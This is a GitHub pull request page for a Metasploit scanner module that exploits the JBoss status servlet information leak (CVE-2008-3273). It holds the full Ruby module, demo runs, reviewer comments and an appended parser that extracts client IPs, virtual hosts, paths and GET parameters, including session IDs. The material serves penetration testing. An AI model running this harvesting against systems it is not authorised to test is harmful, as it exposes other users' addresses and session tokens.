Module to query Jboss status servlet to collect sensitive information #2996

Merged
merged 4 commits into from

4 participants

@mcantoni

Name:
Jboss Status Servlet Info Gathering

Description:
This module queries the Jboss status servlet to collect sensitive
information: URL paths, GET parameters and the clients' IP addresses.
This module has been tested against Jboss 4.0., 4.2.2, 4.2.3.

Note:
Useful during a penetration test. Code and description are free to be modified.

msftidy.rb: OK
Google dork: intitle:"Tomcat Status" "Total memory" (5.630 results)

Install Jboss:

wget http://sourceforge.net/projects/jboss/files/JBoss/JBoss-4.2.3.GA/jboss-4.2.3.GA.zip/download
unzip jboss-4.2.3.GA.zip
./run.sh -Djboss.bind.address= -Djboss.bind.address.management=

Demo (this is only a fake example):

msf auxiliary(jboss_status) > show options

Module options (auxiliary/gather/jboss_status):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   DELAY     5                no        Delay in seconds between requests
   PATH      /status          yes       The Jboss status servlet URI path
   Proxies                    no        Use a proxy chain
   REQCOUNT  3                no        Number of HTTP requests
   RHOSTS    1.2.3.4          yes       The target address range or CIDR identifier
   RPORT     8080             yes       The target port
   THREADS   1                yes       The number of concurrent threads
   VHOST                      no        HTTP server virtual host

msf auxiliary(jboss_status) > set RHOSTS 1.2.3.4
RHOSTS => 1.2.3.4
msf auxiliary(jboss_status) > set REQCOUNT 3
REQCOUNT => 3
msf auxiliary(jboss_status) > set DELAY 5
DELAY => 5
msf auxiliary(jboss_status) > run

[*] 1.2.3.4:8080 1/3 requests...
[*] 1.2.3.4:8080 sleeping for 5 seconds...
[*] 1.2.3.4:8080 2/3 requests...
[*] 1.2.3.4:8080 sleeping for 5 seconds...
[*] 1.2.3.4:8080 3/3 requests...
[*] 1.2.3.4:8080 sleeping for 5 seconds...
[+] 1.2.3.4:8080 JBoss application server!

[+] CLIENTS IP ADDRESSES:
[+] 4.3.2.1

[+] SERVER (VHOST) IP ADDRESSES:
[+] 1.2.3.4

[+] PATH REQUESTS:
[+] GET /status HTTP/1.1
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

@zeroSteiner
Collaborator

This PR includes two modules, modules/auxiliary/gather/jboss_status.rb and modules/auxiliary/scanner/snmp/snmp_enum_hp_laserjet.rb. Not sure if you meant to submit both, as the description only mentions the JBoss module. If you meant to submit both, it would speed things along if they were broken into two separate pull requests so they can be tested individually.

@mcantoni

Sorry, this PR is only for modules/auxiliary/gather/jboss_status.rb.
Now I have to figure out how to remove the module snmp_enum_hp_laserjet.rb :(
The latter already has a PR: #2919

@jvazquez-r7
Collaborator

@mcantoni you can use:

git rm modules/auxiliary/scanner/snmp/snmp_enum_hp_laserjet.rb

Then proceed with git commit and git push origin as usual to push the changes, so the pull request will be updated :) Hope it helps!

@jvazquez-r7
Collaborator

Processing....

@jvazquez-r7 jvazquez-r7 self-assigned this
@jvazquez-r7 jvazquez-r7 merged commit fbcd661 into rapid7:master

1 check passed: The Travis CI build passed
@jvazquez-r7
Collaborator

Hi @mcantoni,

Landed it after several modifications, check final result here: 9374777

(Deleted the RETRY thing because it doesn't look super useful; if you need to keep the module pinging a machine or a set of machines, it's worth adding automation, maybe through an rc file.)

After changes, working successfully:

msf > use auxiliary/scanner/http/jboss_status 
msf auxiliary(jboss_status) > set rhosts 192.168.172.134
rhosts => 192.168.172.134
msf auxiliary(jboss_status) > run

[+] 192.168.172.134:8080 JBoss application server found

JBoss application server requests
=================================

 Client         Vhost target     Request
 ------         ------------     -------
 192.168.172.1  192.168.172.134  GET /status HTTP/1.1

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(jboss_status) > notes
[*] Time: 2014-03-28 20:59:37 UTC Note: host=192.168.172.134 service=http type=JBoss application server info data="192.168.172.134:8080 GET /status HTTP/1.1"
msf auxiliary(jboss_status) > services

Services
========

host             port  proto  name  state  info
----             ----  -----  ----  -----  ----
192.168.172.134  8080  tcp    http  open   Apache-Coyote/1.1 ( Powered by Servlet 2.4; JBoss-4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA date=200807181417)/JBossWeb-2.0 )

Thanks @mcantoni !
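
As an added example that is not part of this PR or of the module's own code: a stand-alone Ruby parser for the status table that the PR description and the landed output above are about (client IPs, vhosts, URL paths, and the GET parameters the description mentions as sensitive). The sample page is constructed here from the column layout noted in the module's comment (Stage, Time, B Sent, B Recv, Client, VHost, Request), the row regex, the `?` placeholder handling for idle worker threads, the HTML-unescaping of the request line and the query-string split are assumptions of this example, not behaviour documented by the module.

```ruby
require 'cgi'
require 'uri'

# Constructed sample of a JBoss/Tomcat "/status" page (not captured from a
# real server). Idle threads carry '?' placeholders, and the servlet
# HTML-escapes the request line, hence "&amp;".
SAMPLE_STATUS_HTML = <<~HTML
  <html><head><title>Tomcat Status</title></head><body>
  <h1>JVM</h1><p> Free memory: 100 MB Total memory: 200 MB Max memory: 500 MB</p>
  <table border="0">
  <tr><th>Stage</th><th>Time</th><th>B Sent</th><th>B Recv</th><th>Client</th><th>VHost</th><th>Request</th></tr>
  <tr><td><strong>S</strong></td><td>12 ms</td><td>0 KB</td><td>0 KB</td><td>192.168.172.1</td><td nowrap>192.168.172.134</td><td nowrap>GET /status HTTP/1.1</td></tr>
  <tr><td><strong>S</strong></td><td>340 ms</td><td>1 KB</td><td>0 KB</td><td>10.0.0.7</td><td nowrap>intranet.example.test</td><td nowrap>GET /app/login?user=bob&amp;sid=abc123 HTTP/1.1</td></tr>
  <tr><td><strong>K</strong></td><td>150463510 ms</td><td>?</td><td>?</td><td>10.0.0.9</td><td nowrap>?</td><td nowrap>?</td></tr>
  <tr><td><strong>R</strong></td><td>?</td><td>?</td><td>?</td><td>?</td><td nowrap>?</td><td nowrap>?</td></tr>
  </table></body></html>
HTML

# One worker-thread row of the connector table. Anchoring on the whole <tr>
# (rather than splitting on "<strong>" as the module does) keeps the other
# <strong> tags on the page from producing spurious matches.
ROW_RE = %r{<tr><td><strong>([A-Z?])</strong></td>
            <td>([^<]*)</td><td>([^<]*)</td><td>([^<]*)</td><td>([^<]*)</td>
            <td\s+nowrap[^>]*>([^<]*)</td><td\s+nowrap[^>]*>([^<]*)</td></tr>}x

# Same fingerprint the module uses to decide it is looking at the status servlet.
def jboss_status_page?(html)
  html.include?('<title>Tomcat Status</title>')
end

# Each row becomes a hash; '?' placeholders become nil so idle threads are
# not reported as clients, vhosts or requests.
def parse_status_rows(html)
  html.scan(ROW_RE).map do |stage, time, _sent, _recv, client, vhost, request|
    {
      stage:   stage,
      time:    time,
      client:  client == '?' ? nil : client,
      vhost:   vhost == '?' ? nil : vhost,
      request: request == '?' ? nil : CGI.unescapeHTML(request)
    }
  end
end

# "GET /app/login?user=bob&sid=abc123 HTTP/1.1" -> method, path and decoded
# query parameters; nil for a line that is not a request line.
def split_request_line(line)
  method, target, _proto = line.split(' ', 3)
  return nil if method.nil? || target.nil?
  uri = URI.parse(target)
  { method: method, path: uri.path, params: URI.decode_www_form(uri.query.to_s).to_h }
rescue URI::InvalidURIError
  nil
end

# Aggregate what the module reports (clients, vhosts, paths) plus the GET
# parameters per path; nil when the page is not a status servlet page.
def summarize_status(html)
  return nil unless jboss_status_page?(html)
  summary = { clients: [], vhosts: [], paths: [], params: {} }
  parse_status_rows(html).each do |row|
    summary[:clients] << row[:client] if row[:client]
    summary[:vhosts]  << row[:vhost]  if row[:vhost]
    next unless row[:request]
    req = split_request_line(row[:request])
    next unless req
    summary[:paths] << req[:path]
    summary[:params][req[:path]] = req[:params] unless req[:params].empty?
  end
  %i[clients vhosts paths].each { |k| summary[k] = summary[k].sort.uniq }
  summary
end

if __FILE__ == $PROGRAM_NAME
  s = summarize_status(SAMPLE_STATUS_HTML)
  puts "Clients: #{s[:clients].join(', ')}"
  puts "VHosts:  #{s[:vhosts].join(', ')}"
  puts "Paths:   #{s[:paths].join(', ')}"
  s[:params].each { |path, kv| puts "Params:  #{path} #{kv.inspect}" }
end
```

Run it with `ruby jboss_status_parse.rb`; on the constructed page it lists three clients, two vhosts, two paths, and the `user`/`sid` parameters leaked by the `/app/login` request. Dropping the `?` placeholders matters: an idle connector thread would otherwise show up as a client named `?`, which is what the module's `req_src << j_src` does without filtering.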

@wvu-r7
Collaborator

@mcantoni: You left f18fef1 and 7c860b9, so GitHub thinks #2919 has been merged.

Commits on Jan 25, 2014
  1. @mcantoni
Commits on Feb 13, 2014
  1. @mcantoni

    fix description

    mcantoni authored
Commits on Feb 15, 2014
  1. @mcantoni
Commits on Mar 21, 2014
  1. @mcantoni
Showing with 147 additions and 0 deletions.
  1. +147 −0 modules/auxiliary/gather/jboss_status.rb
147 modules/auxiliary/gather/jboss_status.rb
@@ -0,0 +1,147 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Auxiliary::Report
+ include Msf::Auxiliary::Scanner
+
+ def initialize
+ super(
+ 'Name' => 'Jboss Status Servlet Info Gathering',
+ 'Description' => %q{
+ This module queries the Jboss status servlet to collect sensitive
+ information: URL paths, GET parameters and the clients IP address.
+
+ Note: this module has been tested against Jboss 4.0., 4.2.2, 4.2.3
+ },
+ 'References' =>
+ [
+ ['CVE', '2008-3273'],
+ ['URL', 'http://seclists.org/fulldisclosure/2011/Sep/139'],
+ ['URL', 'https://www.owasp.org/images/a/a9/OWASP3011_Luca.pdf'],
+ ['URL', 'http://www.slideshare.net/chrisgates/lares-fromlowtopwned'],
+ ],
+ 'Author' => 'Matteo Cantoni <goony[at]nothink.org>',
+ 'License' => MSF_LICENSE
+ )
+
+ register_options([
+ Opt::RPORT(8080),
+ OptString.new('PATH', [ true, "The Jboss status servlet URI path", '/status']),
+ OptInt.new('REQCOUNT', [false, 'Number of HTTP requests', 3]),
+ OptInt.new('DELAY', [false, "Delay in seconds between requests",5])
+ ], self.class)
+ end
+
+ def run_host(target_host)
+
+ jpath = normalize_uri(datastore['PATH'])
+
+ req_src = []
+ req_dst = []
+ req_path = []
+
+ # loop to detect more informations
+ datastore['REQCOUNT'].times do |count|
+ vprint_status("#{rhost}:#{rport} #{count + 1}/#{datastore['REQCOUNT']} requests...")
+
+ begin
+ res = send_request_raw({
+ 'uri' => jpath,
+ 'method' => 'GET'
+ }, 10)
+
+ # detect JBoss application server
+ if res and res.code == 200 and res.body.match(/<title>Tomcat Status<\/title>/)
+ http_fingerprint({ :response => res })
+
+ html_rows = res.body.split(/<strong>/)
+ html_rows.each do |row|
+
+ #Stage Time B Sent B Recv Client VHost Request
+ #K 150463510 ms ? ? 1.2.3.4 ? ?
+
+ # filter client requests
+ if row.match(/(.*)<\/strong><\/td><td>(.*)<\/td><td>(.*)<\/td><td>(.*)<\/td><td>(.*)<\/td><td nowrap>(.*)<\/td><td nowrap>(.*)<\/td><\/tr>/)
+
+ j_src = $5
+ j_dst = $6
+ j_path = $7
+
+ req_src << j_src
+ if !j_dst.match(/\?/)
+ req_dst << j_dst
+ end
+ if !j_path.match(/\?/)
+ req_path << j_path
+ end
+ end
+ end
+ elsif res.code == 401
+ vprint_error("#{rhost}:#{rport} authentication is required!")
+ return
+ elsif res.code == 403
+ vprint_error("#{rhost}:#{rport} forbidden!")
+ return
+ else
+ vprint_error("#{rhost}:#{rport} may not support JBoss application server!")
+ return
+ end
+ end
+
+ if datastore['DELAY'] > 0 and datastore['REQCOUNT'] > 1
+ vprint_status("#{rhost}:#{rport} sleeping for #{datastore['DELAY']} seconds...")
+ select(nil,nil,nil,datastore['DELAY'])
+ end
+ end
+
+ # show results
+ if !req_src.empty?
+
+ print_good("#{rhost}:#{rport} JBoss application server!")
+ report_note({
+ :host => target_host,
+ :proto => 'tcp',
+ :sname => (ssl ? 'https' : 'http'),
+ :port => rport,
+ :type => 'JBoss application server',
+ :data => "#{rhost}:#{rport}"
+ })
+
+ print_line
+ print_good("CLIENTS IP ADDRESSES:")
+ req_src.sort.uniq.each do |e|
+ print_good("#{e}")
+ end
+
+ print_line
+ print_good("SERVER (VHOST) IP ADDRESSES:")
+ req_dst.sort.uniq.each do |e|
+ print_good("#{e}")
+ end
+
+ print_line
+ print_good("PATH REQUESTS:")
+ req_path.sort.uniq.each do |e|
+ print_good("#{e}")
+
+ report_note({
+ :host => target_host,
+ :proto => 'tcp',
+ :sname => (ssl ? 'https' : 'http'),
+ :port => rport,
+ :type => 'JBoss application server info',
+ :data => "#{rhost}:#{rport} #{e}"
+ })
+ end
+
+ end
+ end
+end
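Review bot: `res` can be nil when `send_request_raw` hits the 10-second timeout passed in `}, 10)`, and the `elsif res.code == 401` / `elsif res.code == 403` branches dereference it without the `res and` guard that the first `if` has, so an unresponsive host raises NoMethodError inside `run_host` instead of reaching the "may not support JBoss application server" message; a single `return unless res` before the status checks (or folding the nil case into the final `else`) fixes it. Two smaller points in the same hunk: `http_fingerprint({ :response => res })` runs on every one of the `REQCOUNT` iterations although one call per host is enough, and the module mixes in `Msf::Auxiliary::Scanner` (`run_host`, `RHOSTS`, `THREADS`) while being placed under `modules/auxiliary/gather/`, whereas scanner-style modules live under `modules/auxiliary/scanner/http/` (the landed path quoted in the thread, `auxiliary/scanner/http/jboss_status`). The header URL `http//metasploit.com/download` is also missing its colon.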